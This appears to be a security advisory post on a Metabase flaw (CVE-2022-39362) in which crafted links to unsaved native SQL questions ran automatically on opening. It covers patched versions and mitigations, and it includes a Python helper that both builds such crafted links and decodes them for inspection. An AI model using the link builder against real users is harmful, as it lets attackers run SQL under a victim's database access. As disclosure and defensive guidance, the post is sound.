Metabase is a popular open-source business intelligence tool that lets users explore, visualize, and share data, and many businesses and organizations rely on it for data-driven decisions. Before the fixes shipped in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9 (the 0.x line is the open-source edition, 1.x the enterprise edition), Metabase automatically executed unsaved native SQL queries as soon as they were opened. An attacker could abuse this by getting a user to open a crafted link to such a query. This post covers the exploit details, the patch provided by Metabase, and the suggested mitigations.

Exploit Details

Prior to the patched versions listed above, Metabase ran an unsaved native SQL query in its editor as soon as the question was opened, without waiting for the user to press Run. Because the query runs under the viewing user's Metabase session and that user's database connection, an attacker who can get a victim to open a crafted question can have SQL of the attacker's choosing executed against any database the victim is allowed to query natively: reading data the attacker could not reach directly and, where the connection permits writes or side-effecting functions, modifying data or worse. A minimal example of such a query:

SELECT * FROM sensitive_table WHERE 1=1; -- Auto-executes without user's consent

Metabase addresses an unsaved (ad-hoc) question with a URL that carries the question definition itself, including the SQL text, rather than a reference to something stored on the server. An attacker can therefore build a link to a query of their choosing and send it to a victim. Before the fix, opening that link was enough to run the query and display the results; no Run click or confirmation was needed, so a user who was tricked into following the link executed the rogue query without realizing it.

Original References

Metabase GitHub Repository: https://github.com/metabase/metabase

Metabase Patch Details: https://github.com/metabase/metabase/pull/23037

CVE-2022-39362 NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-39362

Patch and Mitigation

The vulnerability was addressed in Metabase versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9 by disabling the auto-execution. The native editor now loads the query text from the link but does not run it until the user explicitly clicks Run, which gives the user a chance to read the SQL first.

The recommended mitigation is to upgrade to one of the patched versions or a later release. If upgrading is not immediately possible: treat Metabase question links from untrusted sources with suspicion and inspect the embedded SQL before opening them; limit native query access to the users and databases that actually need it, using Metabase's per-database native query permissions; and make sure the database credentials Metabase uses are read-only wherever write access is not required, so that even a rogue query that does get executed cannot modify data.
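As an added example (not code from the original post or from Metabase itself), the helper below serves both the exploit mechanism described above and the "inspect before opening" advice here: it builds a link to an unsaved native question for your own test instance, and it decodes such a link's fragment to show the embedded native SQL without anyone opening it. It assumes that ad-hoc question links carry a base64-encoded JSON card in the URL fragment with the `dataset_query` / `native` / `query` shape used here; the host name, database id and query are constructed sample values.

```python
import base64
import json
from urllib.parse import unquote, urlsplit


def _b64url_encode(obj):
    """Serialize a dict as compact JSON and base64url-encode it without padding."""
    raw = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")


def _b64url_decode(text):
    """Decode base64 in either alphabet (standard or url-safe), padded or not."""
    text = text + "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text)


def build_adhoc_question_url(base_url, database_id, sql):
    """Build a link to an unsaved native question.

    The card layout is an assumption modelled on Metabase's ad-hoc question
    JSON: {"dataset_query": {"type": "native", "native": {"query": ...},
    "database": N}}. Open the result on a test instance: on a patched build
    the SQL is shown but nothing runs until you press Run.
    """
    card = {
        "dataset_query": {
            "type": "native",
            "native": {"query": sql, "template-tags": {}},
            "database": database_id,
        },
        "display": "table",
        "visualization_settings": {},
    }
    return base_url.rstrip("/") + "/question#" + _b64url_encode(card)


def inspect_question_url(url):
    """Return the native query carried by a question link, or None.

    Gives {"database": <id>, "query": <sql>} for an ad-hoc native question.
    Saved questions (/question/<id>) have no fragment and GUI-builder ad-hoc
    questions have type "query" rather than "native"; both return None, as
    does any fragment that is not base64-encoded JSON.
    """
    fragment = urlsplit(url).fragment
    if not fragment:
        return None
    try:
        card = json.loads(_b64url_decode(unquote(fragment)))
    except ValueError:  # bad base64, non-UTF-8 bytes, or non-JSON payload
        return None
    if not isinstance(card, dict):
        return None
    dataset_query = card.get("dataset_query")
    if not isinstance(dataset_query, dict) or dataset_query.get("type") != "native":
        return None
    native = dataset_query.get("native")
    if not isinstance(native, dict) or not isinstance(native.get("query"), str):
        return None
    return {"database": dataset_query.get("database"), "query": native["query"]}


if __name__ == "__main__":
    # Constructed sample: the kind of link an attacker might send, pointing at
    # a hypothetical host and database id.
    link = build_adhoc_question_url(
        "https://metabase.example.internal", 2,
        "SELECT * FROM sensitive_table WHERE 1=1",
    )
    print(link)
    print(inspect_question_url(link))
```

Run `inspect_question_url` over any Metabase link you receive before following it; if it returns a query you did not write, do not open the link on an unpatched instance. Opening a link produced by `build_adhoc_question_url` on your own instance is also a quick way to confirm the fix: an affected build shows results immediately, a patched one waits for Run.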

Conclusion

Metabase has removed the auto-execution of unsaved native SQL queries in the patched releases, closing this attack vector and reducing the attack surface. Users should upgrade to one of the patched versions and, until they do, treat links to unsaved native SQL questions with the same caution as any other untrusted link, since on an affected build opening the link is the same as running the query.

Timeline

Published on: 10/26/2022 19:15:00 UTC
Last modified on: 10/28/2022 16:45:00 UTC